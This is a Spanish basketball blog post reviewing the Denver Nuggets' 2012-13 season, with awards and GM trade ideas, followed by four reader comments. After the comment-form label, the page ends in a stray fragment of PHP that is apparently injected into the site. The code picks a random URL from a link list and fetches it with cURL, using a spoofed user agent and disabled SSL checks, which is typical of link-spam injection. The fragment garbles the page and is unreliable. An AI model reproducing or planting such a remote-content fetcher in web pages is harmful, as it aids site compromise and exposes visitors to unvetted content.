Denver Nuggets: Notable

03 de July de 2013 por Simon

El equipo de Colorado superó todas las expectativas que teníamos a principio de temporada acerca de su número de victorias. En nuestro análisis los colocábamos por encima de las 50 victorias y al final han estado más cerca de las 60 que de las 50. Los Denver Nuggets cerraron la regular season con 57 victorias y el tercer puesto de la conferencia, regalando partidos y jugadas espectaculares por doquier. En play off, la misma historia de siempre. Cayeron en primera ronda ante el empuje de unos espectaculares Golden State Warriors. Quizás si hubieran superado esta ronda la nota hubiera sido un sobresaliente.

La temporada comenzó algo torcida para Denver. Un inicio con un calendario terrible y con la plantilla todavía por acoplar nos hacía pensar que la temporada de los de George Karl iba a ser un autentico fiasco. Nada más lejos de la realidad, en cuanto el calendario les dio un respiro en forma de varios partidos seguidos en casa las victorias comenzaron a llegar a montones. Como ya hemos dicho los 2 primeros meses de competición fueron muy duros para ellos, su balance acumulado en ese periodo fue un pobre 17-15. A partir de ese momento el equipo fue afinando hasta convertirse en una maquina de destrozar rivales a toda velocidad. Su balance en los últimos cuatro meses de competición fue de 40 victorias por sólo 10 derrotas. Denver basó como siempre su juego en la velocidad de sus transiciones que unidas a la gran profundidad de la plantilla terminaban por agotar al equipo rival. En casa fueron el mejor equipo de la competición cediendo tan sólo 3 partidos en toda la temporada regular llegando a lograr 23 victorias consecutivas. Todas estas buenas sensaciones durante la temporada regular se diluyeron en Play Off, en los que unos inspiradísimos Golden State Warriors los apearon a las primeras de cambio. En su defensa hay que decir que fue más mérito de Curry y sus compañeros que demérito de los de Karl. 

El máximo anotador  y asistente del equipo fue Ty Lawson que se ha erigido esta temporada como el líder auténtico de la franquicia ante la escasa mejora de Gallinari.  Aún así  el juego colectivo que practican los de Karl permitió hasta a 6 jugadores promediar dobles figuras en anotación lo que les llevó  a ser el equipo con más puntos por partidos de la liga, el segundo en rebotes  y el tercero en asistencias. Números sin duda espectaculares.

Aún siendo una grandísima temporada en lo global para Denver hay varios aspectos negativos que nos hacen pensar en un futuro gris para la franquicia. La marcha de su general manager y del recientemente nombrado “entrenador del año” George Karl no parecen síntomas nada buenos para el futuro de la plantilla.

PREMIOS

MVP: Sin duda el MVP de la temporada de Denver Nuggets ha sido Ty Lawson que se ha mostrado como un muy sólido base titular para una franquicia ganadora llevando el peso del juego y siendo capaz de aportar en muchísimas facetas.

Rookie: Apenas ha habido protagonismo para los rookies en Denver este año pero el joven francés Evan Fournier ha demostrado que puede ser una pieza muy importante en el futuro de la franquicia dejando muchos destellos cuando ha dispuesto de minutos.

Sorpresa: Pocas sorpresas para Denver esta temporada. Más o menos todos han rendido acorde a las expectativas que levantaban a principio de temporada, quizás el aporte mayúsculo de Corey Brewer desde el banco por destacar a alguien.

Decepción: Decepciones relativas en este apartado. Danilo Gallinari sigue siendo un gran jugador con muchísimas virtudes pero en Denver pretendían  que diera un paso más y se convirtiera en un jugador franquicia, algo que no ha ocurrido. Parecido para Javale McGee que no tiene visos de convertirse en el pívot dominante que todos en Denver esperan.  El primer candidato que pensamos es Anthony Randolph pero lo cierto es que no ha tenido minutos ni siquiera para ser una decepción.

Esfuerzo en Vano: Este va para el veteranísimo André Miller que en Play Off sacó las castañas del fuego en muchos momentos a Denver para finalmente caer en primera ronda.

JUGANDO A GM

Habría que decidir el rumbo que va a tomar la franquicia. si este modelo de jugadores de perfil medio-alto nos sigue valiendo o bien tenemos que cambiar nuestra apuesta y movernos buscando un jugador franquicia de verdad.  Como tenemos a toda la plantilla bajo contrato excepto Iguodala y Brewer, lo lógico sería apostar por la continuidad del proyecto aunque siempre abiertos y atentos a las grandes posibilidades que da esta plantilla en materia de traspasos. como estamos “jugando” pues vamos a ello.

  • El primer paso sería la renovación de Iguodala. Un contrato parecido al de Gallinari sería un precio aceptable a pagar por el escolta. No será fácil porque hay muchos equipos interesados en él.
  • La renovación de Brewer quedaría a la expectativa de la evolución de los movimientos que vamos a intentar realizar para reforzar el juego interior.
  • Sería interesante reforzar el juego interior, sobre todo con un jugador capaz de aportar en estático. Así que exploraríamos la posibilidad de pescar algo en  Utah pues Jefferson y Kanter son dos jugadores que podrían encajar muy bien en el perfil que andamos buscando a un precio asequible dado la gran batería de externos que disponemos. Chandler por Kanter sería una buena operación.
  • ¿Y si nos la jugamos con Bynum, que tendrá un precio “asequible” y tengo jugadores interesantes como Chandler,  Brewer o McGee totalmente desaprovechados en mi plantel? Sería un riesgo que dependiendo del precio podría ser aceptable asumir. Si Sixers no va a mantenerlo un Chandler + McGee sería un buen precio a pagar por él.
Comenta

4 comentarios a esta entrada

  1. sempren dice:
    #1

    Chandler no ha estado en casi toda la temporada, pero estos últimos meses ha sido muy importante, tanto al lado de Gallinari como en su ausencia. Sí que puede estar algo infrautilizado si todo el mundo está sano, pero para mí es un jugador muy importante, aporta en todos los sentidos. Si se traspasa, me parece que una oferta como la que citas es un mal negocio para Denver (especialmente por un Bynum que no jugó en todo el año y sin contrato en vigor con Philly).

    Un movimiento importante fue el de Koufos: les hacía falta un PF que pudiese anotar, más allá de que Gallo no siempre puede jugar de 4, y que Faried “no es tan útil” dependiendo del rival o de como se plantee el partido. Es una pena perder al griego, que hizo una temporada bastante buena, pero Arthur puede ser un gran refuerzo.

    Y bueno, además de comentar que la derrota fue más mérito de Curry y los suyos que demérito de los Nuggets, habría que citar la baja de Gallinari como muy importante en esa eliminatoria.
    De todos modos, queda un mal sabor de boca al no haber logrado superar la primera ronda en los últimos años, para una vez que teníamos un rival “asequible” (Lakers y Thunder fueron los de 2011 y 2012 si no recuerdo mal) y ventaja de campo

      Citar

  2. txusma dice:
    #2

    En el juego coral de los Nuggets no creo que exista la figura del jugador franquicia. Ty Lawson puede haber sido el mejor pero, por ejemplo, recuerdo tiros ganadores de Gallinari y Miller. Iguodala, más allá de lo demencial de sus tiros libres, ha jugado una buena temporada muy encarada al equipo (solo hay 5 jugadores q promedien más de 10 puntos, 5 rebotes y 5 asistencias), Faried ha aportado la intensidad reboteadora que se esperaba de él, etc…

    Hemos disfrutado de una gran temporada por parte de los Nuggets q sólo un increíble Stephen Curry ha podido parar. Nunca lo sabremos pero yo creo que con Gallinari sano las cosas hubieran cambiado.

      Citar

  3. Simon dice:
    #3

    Puede ser, el caso es que yo creo que con Gallinari la historia hubiera sido la misma, GSW simplemente estuvo espectacular, fijaros lo que le costó a SAS quitarselos de enmedio en la semifinal con sus dos interiores lesionado uno y el otro muy tocado….
    Por otra parte aqui elegí a Lawson porque fue el más regular… pero es que el MVP podría haber sido casi cualquiera… es un juego muy coral…
    Para mi la temporada de Iguodala ha sido bastante buena, ha hecho lo que el equipo requeria de el… ha demostrado por segundo año que está en la madurez de su carrera, que lejos de buscar el lucimiento personal, es capaz de quedarse apartado de las luces y trabajar en pos del equipo haciendo el trabajo sucio… los Nuggets perderían mucho si lo pierden…
    Por otro lado siempre he defendido este sistema sin grandes estrellas… pero no sé quizás haya llegado el momento de jugarsela por alguna estrella de verdad… si fueran pocos años los que llevan en Play Off… pues vale pero en los últimos diez años han pisado la post temporada casi todos los años y yo creo que tener el equipo siempre anclado en tierra de nadie al final termina por aburrir… es sólo mi opinión como aficionado de la NBA… con el que simplemente simpatizo…al igual que con muchos otros equipos. Si fuera el GM de verdad, no tocaría nada… más vale seguir siendo ganadores y mantener a la peña contenta aunque no gane el anillo que hacer un movimiento que arruine esta buena sintonia y juego del equipo…

      Citar

  4. rumbero dice:
    #4

    Simon:
    Por otro lado siempre he defendido este sistema sin grandes estrellas… pero no sé quizás haya llegado el momento de jugarsela por alguna estrella de verdad… si fueran pocos años los que llevan en Play Off… pues vale pero en los últimos diez años han pisado la post temporada casi todos los años y yo creo que tener el equipo siempre anclado en tierra de nadie al final termina por aburrir… es sólo mi opinión como aficionado de la NBA… con el que simplemente simpatizo…al igual que con muchos otros equipos. Si fuera el GM de verdad, no tocaría nada… más vale seguir siendo ganadores y mantener a la peña contenta aunque no gane el anillo que hacer un movimiento que arruine esta buena sintonia y juego del equipo…

    Pienso parecido, y supongo que en la franquicia también, de ahí el echar a Karl y traer a Shaw. Es más cómodo intentar revertir la dinámica perdedora de PO con un cambio de entrenador y no de media plantilla.
    Tengo un par de amigos de los Nuggets que han estado más que contentos con la marcha de Karl al que siempre le han recriminado muchas decisiones en postemporada. En cualquier caso, a mi me parece bien intentar alargar este proyecto de equipo dándoselo ademas a un tio como Shaw

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>